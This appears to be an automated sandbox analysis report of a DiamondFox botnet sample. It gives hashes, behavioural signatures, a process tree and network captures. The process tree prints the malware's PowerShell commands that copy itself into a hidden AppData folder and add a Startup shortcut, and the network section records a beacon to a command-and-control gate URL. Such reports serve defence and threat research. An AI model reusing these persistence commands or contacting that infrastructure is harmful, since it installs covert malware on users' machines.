Analysis

  • max time kernel
    150s
  • max time network
    103s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22/01/2021, 17:28 UTC

General

  • Target

    1607460946_Loade.exe

  • Size

    140KB

  • MD5

    7bf6de1dc69718455fb90e9a30a9183d

  • SHA1

    3a7f90978908d56d2b689aede98572581442cb19

  • SHA256

    8ca67e40d0d3826efc58feb163760f994eae52731f74c2a3d0d45148a2996bb2

  • SHA512

    78d208eb831789a85d3a5920560fa7c7fe1385491830dbc1e6caac35bb7cba66692cdc1d6b9c06f12a80767e1fa78cb56f011ab9e982839976757fd6cc08ccd9

Malware Config

Signatures

  • DiamondFox

    DiamondFox is a multipurpose botnet with many capabilities.

  • DiamondFox payload 2 IoCs

    Detects DiamondFox payload in file/memory.

  • Executes dropped EXE 1 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 90 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 97 IoCs
  • Suspicious use of SendNotifyMessage 96 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe
    "C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:648
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Copy-Item -Path 'C:\Users\Admin\AppData\Local\Temp\1607460946_Loade.exe' -Destination 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe';Start-Sleep -s 60;Start-Process 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe
        "C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3992
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $shell = New-Object -ComObject WScript.Shell;$shortcut = $shell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\atiedxx.lnk');$shortcut.TargetPath = 'C:\Users\Admin\AppData\Local\xdaeitx\atiedxx.exe';$shortcut.Save()
          4⤵
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3928

Network

  • flag-unknown
    DNS
    ip.seeip.org
    atiedxx.exe
    Remote address:
    8.8.8.8:53
    Request
    ip.seeip.org
    IN A
    Response
    ip.seeip.org
    IN A
    23.128.64.141
  • flag-unknown
    DNS
    www.microsoft.com
    atiedxx.exe
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    2.21.41.70
  • flag-unknown
    DNS
    milyunir.net
    atiedxx.exe
    Remote address:
    8.8.8.8:53
    Request
    milyunir.net
    IN A
    Response
    milyunir.net
    IN A
    8.209.72.194
  • flag-unknown
    GET
    http://milyunir.net/jp/gate.php?ct=1
    atiedxx.exe
    Remote address:
    8.209.72.194:80
    Request
    GET /jp/gate.php?ct=1 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Keep-Alive: 300
    Pragma: no-cache
    Accept: text/plain
    Accept-Charset: utf-8
    Accept-Language: en-us,en;q=0.5
    Cookie: 8bc27df988e26d6b
    Referer: http://www.microsoft.com/
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15
    Host: milyunir.net
    Response
    HTTP/1.0 503 Service Unavailable
    Cache-Control: no-cache
    Connection: close
    Content-Type: text/html
  • 84.232.229.24:80
    40 B
    46 B
    1
    1
  • 23.128.64.141:443
    ip.seeip.org
    tls
    atiedxx.exe
    1.1kB
    3.8kB
    10
    10
  • 2.21.41.70:80
    www.microsoft.com
    atiedxx.exe
    190 B
    92 B
    4
    2
  • 8.209.72.194:80
    http://milyunir.net/jp/gate.php?ct=1
    http
    atiedxx.exe
    639 B
    344 B
    5
    3

    HTTP Request

    GET http://milyunir.net/jp/gate.php?ct=1

    HTTP Response

    503
  • 8.8.8.8:53
    ip.seeip.org
    dns
    atiedxx.exe
    58 B
    74 B
    1
    1

    DNS Request

    ip.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    www.microsoft.com
    dns
    atiedxx.exe
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    2.21.41.70

  • 8.8.8.8:53
    milyunir.net
    dns
    atiedxx.exe
    58 B
    74 B
    1
    1

    DNS Request

    milyunir.net

    DNS Response

    8.209.72.194

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/648-2-0x00000000009D0000-0x00000000009D1000-memory.dmp

    Filesize

    4KB

  • memory/648-6-0x0000000000400000-0x000000000041A000-memory.dmp

    Filesize

    104KB

  • memory/648-5-0x00000000001C0000-0x00000000001D8000-memory.dmp

    Filesize

    96KB

  • memory/1924-13-0x00000000078A0000-0x00000000078A1000-memory.dmp

    Filesize

    4KB

  • memory/1924-12-0x0000000007090000-0x0000000007091000-memory.dmp

    Filesize

    4KB

  • memory/1924-15-0x0000000007C60000-0x0000000007C61000-memory.dmp

    Filesize

    4KB

  • memory/1924-16-0x0000000004812000-0x0000000004813000-memory.dmp

    Filesize

    4KB

  • memory/1924-17-0x00000000079A0000-0x00000000079A1000-memory.dmp

    Filesize

    4KB

  • memory/1924-18-0x0000000008420000-0x0000000008421000-memory.dmp

    Filesize

    4KB

  • memory/1924-19-0x00000000081F0000-0x00000000081F1000-memory.dmp

    Filesize

    4KB

  • memory/1924-20-0x0000000009030000-0x0000000009031000-memory.dmp

    Filesize

    4KB

  • memory/1924-21-0x0000000008EF0000-0x0000000008EF1000-memory.dmp

    Filesize

    4KB

  • memory/1924-22-0x0000000008F50000-0x0000000008F51000-memory.dmp

    Filesize

    4KB

  • memory/1924-23-0x0000000009600000-0x0000000009601000-memory.dmp

    Filesize

    4KB

  • memory/1924-24-0x000000000A180000-0x000000000A181000-memory.dmp

    Filesize

    4KB

  • memory/1924-14-0x0000000007910000-0x0000000007911000-memory.dmp

    Filesize

    4KB

  • memory/1924-11-0x0000000007200000-0x0000000007201000-memory.dmp

    Filesize

    4KB

  • memory/1924-28-0x0000000004813000-0x0000000004814000-memory.dmp

    Filesize

    4KB

  • memory/1924-8-0x0000000073E00000-0x00000000744EE000-memory.dmp

    Filesize

    6.9MB

  • memory/1924-9-0x0000000004710000-0x0000000004711000-memory.dmp

    Filesize

    4KB

  • memory/1924-10-0x0000000004810000-0x0000000004811000-memory.dmp

    Filesize

    4KB

  • memory/2592-36-0x0000000074070000-0x000000007475E000-memory.dmp

    Filesize

    6.9MB

  • memory/2592-42-0x0000000008060000-0x0000000008061000-memory.dmp

    Filesize

    4KB

  • memory/2592-44-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

    Filesize

    4KB

  • memory/2592-45-0x0000000004BB2000-0x0000000004BB3000-memory.dmp

    Filesize

    4KB

  • memory/2592-47-0x0000000008430000-0x0000000008431000-memory.dmp

    Filesize

    4KB

  • memory/2592-53-0x0000000004BB3000-0x0000000004BB4000-memory.dmp

    Filesize

    4KB

  • memory/3992-29-0x0000000000920000-0x0000000000921000-memory.dmp

    Filesize

    4KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.